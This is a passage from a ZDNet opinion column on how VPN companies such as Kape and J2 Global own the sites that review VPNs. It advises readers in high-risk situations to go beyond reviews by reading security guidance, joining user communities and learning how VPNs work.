How valuable are reviews to VPN companies? Consider how much Kape spent on Webselenese. That amount: $149 million. If you’re going to spend $149 million to control the review conversation, there’s got to be a lot of money at play. But Kape isn’t the only VPN company that owns its own reviews sites. Let’s spend a moment exploring J2 Global. J2 Global launched in 1995 as the provider of the JFax faxing service. The internet was barely a thing back then, and faxing was big. Over the next decade and a half or so, J2 stayed pretty much in its lane, offering fax services under a variety of brands. Then, in 2012, it started a media acquisitions spree. In 2012, it bought publisher Ziff-Davis. For the record, the ZD in ZDNet harkens back to the Ziff-Davis brand, but ZDNet was spun out as a separate company and hasn’t been affiliated with Ziff-Davis for more than 20 years. In some ways, in fact, we’re now direct competitors. The J2 acquisition of Ziff-Davis bought the company a bunch of very familiar tech publications, including PCMag, Spiceworks, ExtremeTech, IGN, and Mashable. Then, in 2019, J2 scooped up VPN vendors SaferVPN, IPVanish, and StrongVPN. Where VPNMentor is clearly biased in its coverage, I have to give it to PCMag.com. Of the ten best VPN services it lists on its “best of 2021” page, its parent company does not own one.
Source: PCMag.com
Even so, we’ve now identified that many of the top VPNs are owned by the same companies that own the top VPN review sites. Conclusion: If you’re putting your life on the line, you might not want to trust these sites for unbiased reviews. What should you do? Even unbiased reviews like those I produce aren’t enough to rely upon if you’re a VPN life-and-deather. I put in about a week of testing per VPN, and I test from here in central Oregon. I can’t travel all around the world and test how safe and secure a given VPN service is when used, for example, in the UAE instead of Oregon. For those who haven’t been following along through all my VPN guides, VPN usage in the United Arab Emirates is illegal and could get you sent to jail or fined up to the UAE equivalent of $500,000. While a professional reviewer might be able to provide a relatively comprehensive review of one VPN he or she lives with over the course of a few years, no reviewer is going to be able to spend months of time testing each and every one of an entire set of VPNs. It’s just not practical or possible. So no matter which reviews you read, the test results are going to be limited to what could be practically tested by the reviewer in question. If your life is at stake, these tests are too limited. Period. I’d recommend you dive much deeper into this tool you’re going to be depending on. First, read this excellent guide just recently put out by the NSA and CISA. A lot of it is designed for corporate networks, but the protocol discussion is first-rate. Second, seek out others in your life-and-deather community. Folks who have dealt with the same kind of security challenges and risks will have a better experience than some other reviewer who only theoretically walks in your shoes. Read forums. Read user reviews. Read a lot. And, third, get to know how VPNs work on a technical level. Here’s a Digital Ocean article that gets you started running your own VPN server. But don’t stop with just one article. If your life is dependent on this technology, learn. Take courses on computer security. Learn everything you can on how data moves on the internet. Coursera, for example, offers free in-depth university-level classes. The only time you have to pay is if you want the credential. But if you’re more concerned about your personal security than your resume, you can learn a tremendous amount and not spend anything. My bottom line for all of this is simple: There are ways you can learn enough to create a safer situation for yourself. Just quickly scanning product reviews tells you very little about the best way to stay alive and safe. You can follow my day-to-day project updates on social media. Be sure to follow me on Twitter at @DavidGewirtz, on Facebook at Facebook.com/DavidGewirtz, on Instagram at Instagram.com/DavidGewirtz, and on YouTube at YouTube.com/DavidGewirtzTV.

ZDNet Recommends More